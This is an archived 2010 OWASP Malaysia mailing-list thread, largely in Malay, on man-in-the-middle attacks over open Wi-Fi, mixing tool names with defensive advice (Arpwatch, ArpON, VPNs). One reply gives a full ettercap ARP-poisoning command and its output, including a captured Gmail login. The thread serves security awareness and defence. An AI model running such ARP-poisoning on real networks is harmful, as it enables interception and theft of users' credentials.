[Owasp-Malaysia] Man In The Middle Attack Wireless

Amir Haris amirharis at gmail.com
Fri Sep 24 14:42:10 EDT 2010


Yeah,

Tapi end-user biasa tak concern pasal nak guna tools ni.. Janji dpt masuk
site.. desperate nak FB.. hehe
Mcm mana dengan kelas?

On Sat, Sep 25, 2010 at 2:35 AM, Hasanuddin Abu Bakar <
hasanuddin at sigmarectrix.com> wrote:

> On Sat, Sep 25, 2010 at 2:16 AM, MASOKIS <masokis at gmail.com> wrote:
> > kat indonesia siap buat bengkel lagi..wow...
> > firewall tak mampu nak halang ke MiTM  ni ?
> >
>
> Arpwatch untuk detect dan report ARP spoofing
> http://en.wikipedia.org/wiki/Arpwatch
> ArpON untuk detect dan block ARP spoofing http://arpon.sourceforge.net/
>
>
>
>
> > On Sat, Sep 25, 2010 at 1:34 AM, Faizul <faizul at mysecurity.my> wrote:
> >>
> >> kalau nak selamat sekurangnya ada jugak la antivirus, internet security
> >> dan lain-lain.
> >> sekurang-kurangnya mencabar sikit kalau sapa nak hack ke nak apa ke.
> >> ini kosong je, bogel sapa tak stim. kalau askar nak gi perang bogel tak
> >> pakai baju pun paling ciput ada rifle dengan peluru jugak.
> >> guna broadband sendiri pun orang boleh tengok jgk, tp kena ada device
> yang
> >> canggih baru boleh, spisis gsm interceptor dan lain-lain.
> >> ada terbaca pasal GSM hacking ? A5/1 ? USRP ? openbts ? benda tu pun
> ramai
> >> jugak berminat. kat indonesia ramai dah try main-main dgn benda ni.
> >>
> >>
> >> On Sat, Sep 25, 2010 at 12:18 AM, Amir Haris <amirharis at gmail.com>
> wrote:
> >>>
> >>> This paper is quite old, but it helps us to understand on how to detect
> >>> sniffer.
> >>> www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf
> >>>
> >>>
> >>> On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran
> >>> <mfazliazran at gmail.com> wrote:
> >>>>
> >>>> Hebat Guru Faizul nie buat live hack.. . memandangkan open network
> >>>> memang bermasalah lagi2 kalau ada di mamak,kopitiam, atau mana2 kedai
> yang
> >>>> memberikan access free wifi nie. Ramai rakyat Malaysia tidak sedar
> akan
> >>>> kebolehan para2 hacker ni mencuri maklumat tanpa disedari oleh
> pengguna yang
> >>>> rata2 nye bergumbira bila dapat Wifi free tapi belakang takbir mereka
> tak
> >>>> tau.
> >>>>
> >>>> Tapi please consider use VPN kalau nak masuk ke open network nie..
> maybe
> >>>> akan banyak membantu anda untuk protect laptop anda dari di sniffer
> yang
> >>>> senantiasa membaca packet anda...
> >>>>
> >>>> Pastikan anda delete semua cookie yang ada dalam browser anda sebelum
> >>>> connect ke wifi tersebut. Pastikan yer!!
> >>>>
> >>>> Kalau untuk pengguna window tegar boleh try guna Hotspot Shield ini.
> >>>> banyak kebaikannya... amin!!! dah ada untuk iphone la .. boleh
> download
> >>>> untuk peminat2 iphone. :)
> >>>>
> >>>> Pastikan laptop anda tidak ada buat public file sharing.. pastikan
> >>>> tau!!!
> >>>>
> >>>> Last jangan connect terlampau lama dengan open network ni lagi lama
> anda
> >>>> connect lagi banyak information hackers2 ni dapat. Pastikan anda tidak
> leka
> >>>> dan lalai yer!!!
> >>>>
> >>>> Sebenarnya banyak lagi software yang boleh digunakan untuk protect
> >>>> laptop anda jika anda banyak explore dan menyelidik sedikit sebanyak
> tentang
> >>>> cara nak protect laptop anda especially untuk pengguna windows.. tapi
> jangan
> >>>> sangka pulak pengguna OS lain boleh terlepas... huhuhu.
> >>>> P/S: kalau anda rasa anda seorang geek cuba guna ARPWatch,
> Arpsnmp atau
> >>>> DecaffeinatID anda mesti menyukainya.. :P
> >>>> On Fri, Sep 24, 2010 at 9:20 PM, Faizul <faizul at mysecurity.my> wrote:
> >>>>>
> >>>>> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah
> target
> >>>>> dan 254 adalah gateway
> >>>>>
> >>>>> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau
> >>>>> dragon
> >>>>>
> >>>>> Listening on eth0... (Ethernet)
> >>>>>
> >>>>>   eth0 ->       00:0C:29:97:59:E4          10.1.1.1     255.255.255.0
> >>>>>
> >>>>> Privileges dropped to UID 0 GID 0...
> >>>>>
> >>>>>   28 plugins
> >>>>>   39 protocol dissectors
> >>>>>   53 ports monitored
> >>>>> 7587 mac vendor fingerprint
> >>>>> 1698 tcp OS fingerprint
> >>>>> 2183 known services
> >>>>>
> >>>>> Scanning for merged targets (2 hosts)...
> >>>>>
> >>>>> * |==================================================>| 100.00 %
> >>>>>
> >>>>> 2 hosts added to the hosts list...
> >>>>>
> >>>>> ARP poisoning victims:
> >>>>>
> >>>>>  GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92
> >>>>>
> >>>>>  GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6
> >>>>> Starting Unified sniffing...
> >>>>>
> >>>>>
> >>>>> Text only Interface activated...
> >>>>> Hit 'h' for inline help
> >>>>>
> >>>>> HTTP : 74.125.127.99:443 -> USER: 9w2pju  PASS: selamathariraya
> INFO:
> >>>>>
> https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3
> >>>>>
> >>>>> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <amirharis at gmail.com>
> >>>>> wrote:
> >>>>>>
> >>>>>> Haris,
> >>>>>>
> >>>>>> Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar...
> >>>>>>
> >>>>>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <hazrul at hazrulnz.net
> >
> >>>>>> wrote:
> >>>>>>>
> >>>>>>>  Based on the blog post, plenty of tools can be used to perform
> such
> >>>>>>> attacks. Nowadays tools are getting more "user friendly" and yeah
> >>>>>>> since
> >>>>>>> he's using insecure Wifi facility -visible network packets/traffics
> -
> >>>>>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with
> >>>>>>> ferret and hamster is much more easier. But based on the symptoms
> or
> >>>>>>> the
> >>>>>>> screenshots, it is more monkey in the middle attack compared to
> >>>>>>> sidejacking (I prefer this one).
> >>>>>>>
> >>>>>>> So, never access your private accounts using insecure or open ap
> >>>>>>> wireless environment. Guna la broadband.. :D
> >>>>>>>
> >>>>>>> p/s: besides I believe nobody actually read/understand/concern on
> the
> >>>>>>> warning popups regarding the cert validity. Usually we just click
> >>>>>>> "Add
> >>>>>>> exception" and "proceed" :D
> >>>>>>>
> >>>>>>> That's my 2 halala
> >>>>>>>
> >>>>>>> Thanks
> >>>>>>>
> >>>>>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote:
> >>>>>>> > There is https/ssl mitm in the cain & abel using fake
> >>>>>>> > private/public key. It intercepts the ssl handshake and providing
> the fake
> >>>>>>> > key (if the key is not trusted) to the client. In my previous
> test, my
> >>>>>>> > friend realized a fake ssl for maybank site when I'm running the
> attack, and
> >>>>>>> > he told me maybank has been hacked (but not). For wireless (not
> ethernet)
> >>>>>>> > layer 2, there is utility like airpwn and karma for this kind of
> attack. I
> >>>>>>> > haven't read yet the blog but to answer first the question.
> Wallahualam.
> >>>>>>> > Sent from my BlackBerry® smartphone
> >>>>>>> >
> >>>>>>> > -----Original Message-----
> >>>>>>> > From: Harisfazillah Jamel <linuxmalaysia at gmail.com>
> >>>>>>> > Sender: owasp-malaysia-bounces at lists.owasp.org
> >>>>>>> > Date: Fri, 24 Sep 2010 19:21:31
> >>>>>>> > To: owasp-malaysia<owasp-malaysia at lists.owasp.org>
> >>>>>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless
> >>>>>>> >
> >>>>>>> > Tittle should be man in the minddle attack..
> >>>>>>> >
> >>>>>>> > ettercap can be used to capture packet. But its hard to get our
> >>>>>>> > password in HTTPS protocol. I believe a kind of proxy is used for
> >>>>>>> > this.
> >>>>>>> >
> >>>>>>> > Any idea what kind of proxy?
> >>>>>>> >
> >>>>>>> >
> >>>>>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote:
> >>>>>>> >> ARP poisoning can be used.ettercap
> >>>>>>> >>
> >>>>>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel"
> >>>>>>> >> <linuxmalaysia at gmail.com> wrote:
> >>>>>>> >>> Assalamualaikum and salam sejahtera,
> >>>>>>> >>>
> >>>>>>> >>> Would like to share this blog post.
> >>>>>>> >>>
> >>>>>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/
> >>>>>>> >>>
> >>>>>>> >>> How man in the middle attack can be used in this case?
> >>>>>>> >>>
> >>>>>>> >>> Thanks.
> >>>>>>> > _______________________________________________
> >>>>>>> > Owasp-Malaysia mailing list
> >>>>>>> > Owasp-Malaysia at lists.owasp.org
> >>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>>>>> >
> >>>>>>> > OWASP Malaysia Wiki
> >>>>>>> > http://www.owasp.org/index.php/Malaysia
> >>>>>>> >
> >>>>>>> > OWASP Malaysia Wiki Facebook
> >>>>>>> >
> >>>>>>> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>>>>>> > _______________________________________________
> >>>>>>> > Owasp-Malaysia mailing list
> >>>>>>> > Owasp-Malaysia at lists.owasp.org
> >>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>>>>> >
> >>>>>>> > OWASP Malaysia Wiki
> >>>>>>> > http://www.owasp.org/index.php/Malaysia
> >>>>>>> >
> >>>>>>> > OWASP Malaysia Wiki Facebook
> >>>>>>> >
> >>>>>>> >
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>>>>>> >
> >>>>>>>
> >>>>>>> _______________________________________________
> >>>>>>> Owasp-Malaysia mailing list
> >>>>>>> Owasp-Malaysia at lists.owasp.org
> >>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>>>>>
> >>>>>>> OWASP Malaysia Wiki
> >>>>>>> http://www.owasp.org/index.php/Malaysia
> >>>>>>>
> >>>>>>> OWASP Malaysia Wiki Facebook
> >>>>>>>
> >>>>>>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>>>>>
> >>>>>>
> >>>>>> _______________________________________________
> >>>>>> Owasp-Malaysia mailing list
> >>>>>> Owasp-Malaysia at lists.owasp.org
> >>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>>>>
> >>>>>> OWASP Malaysia Wiki
> >>>>>> http://www.owasp.org/index.php/Malaysia
> >>>>>>
> >>>>>> OWASP Malaysia Wiki Facebook
> >>>>>>
> >>>>>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>>>>
> >>>>>
> >>>>>
> >>>>> --
> >>>>> 73 de 9W2PJU
> >>>>>
> >>>>> http://9w2pju.blogspot.com
> >>>>>
> >>>>>
> >>>>> _______________________________________________
> >>>>> Owasp-Malaysia mailing list
> >>>>> Owasp-Malaysia at lists.owasp.org
> >>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>>>
> >>>>> OWASP Malaysia Wiki
> >>>>> http://www.owasp.org/index.php/Malaysia
> >>>>>
> >>>>> OWASP Malaysia Wiki Facebook
> >>>>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>>>
> >>>> Mohd Fazli Azran
> >>>> Pengguna Internet Tegar
> >>>> _______________________________________________
> >>>> Owasp-Malaysia mailing list
> >>>> Owasp-Malaysia at lists.owasp.org
> >>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>>
> >>>> OWASP Malaysia Wiki
> >>>> http://www.owasp.org/index.php/Malaysia
> >>>>
> >>>> OWASP Malaysia Wiki Facebook
> >>>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>>
> >>>
> >>> _______________________________________________
> >>> Owasp-Malaysia mailing list
> >>> Owasp-Malaysia at lists.owasp.org
> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>>
> >>> OWASP Malaysia Wiki
> >>> http://www.owasp.org/index.php/Malaysia
> >>>
> >>> OWASP Malaysia Wiki Facebook
> >>>
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>
> >>
> >>
> >> --
> >> 73 de 9W2PJU
> >>
> >> http://9w2pju.blogspot.com
> >>
> >>
> >> _______________________________________________
> >> Owasp-Malaysia mailing list
> >> Owasp-Malaysia at lists.owasp.org
> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>
> >> OWASP Malaysia Wiki
> >> http://www.owasp.org/index.php/Malaysia
> >>
> >> OWASP Malaysia Wiki Facebook
> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >
> >
> >
> > --
> >>> HTTP://WWW.MASOKIS.COM <<
> >
> >
> > _______________________________________________
> > Owasp-Malaysia mailing list
> > Owasp-Malaysia at lists.owasp.org
> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >
> > OWASP Malaysia Wiki
> > http://www.owasp.org/index.php/Malaysia
> >
> > OWASP Malaysia Wiki Facebook
> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20100925/581d7dcb/attachment-0001.html 


More information about the Owasp-Malaysia mailing list